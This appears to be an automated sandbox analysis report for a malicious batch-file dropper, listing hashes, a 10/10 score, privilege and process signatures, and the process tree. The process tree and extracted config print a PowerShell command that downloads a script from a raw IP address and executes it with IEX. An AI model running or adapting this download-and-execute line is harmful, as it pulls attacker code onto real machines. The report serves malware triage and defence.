Analysis
- max time kernel: 118s
- max time network: 122s
- platform: windows10_x64
- resource: win10v200217
- submitted: 29-03-2020 01:10
Static task: static1

Behavioral task: behavioral1
- Sample: 1c1ZUgnt.bat
- Resource: win7v200217 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 1c1ZUgnt.bat
- Resource: win10v200217 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 1c1ZUgnt.bat
- Size: 196B
- MD5: cb7296b610a771b90d52c03f98af690c
- SHA1: 98bb42352fded772b23aa8bdc75ca2b494f3f9f6
- SHA256: 22c855a56ba425079b34a778d8144851b1217a719c1020c77f3765c3edef8b6b
- SHA512: a21fa057c0919aa80fb56dd65c1360fea894bfe267727d9c22e9dfa519ac57bf74e0693f0472ffc1249b62a527296e92a2865465b314930f131909789602b510
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/1c1ZUgnt
Signatures
- Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    3836  3536        WerFault.exe  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                pid   process
    Token: SeRestorePrivilege  3836  WerFault.exe
    Token: SeBackupPrivilege   3836  WerFault.exe
    Token: SeDebugPrivilege    3836  WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid   process
    3836  WerFault.exe (same entry repeated 14 times)
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1c1ZUgnt.bat"
  PID: 4032
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1c1ZUgnt');Invoke-SCUCDUFCWDDHX;Start-Sleep -s 10000"
    PID: 3536
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 704
      PID: 3836
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses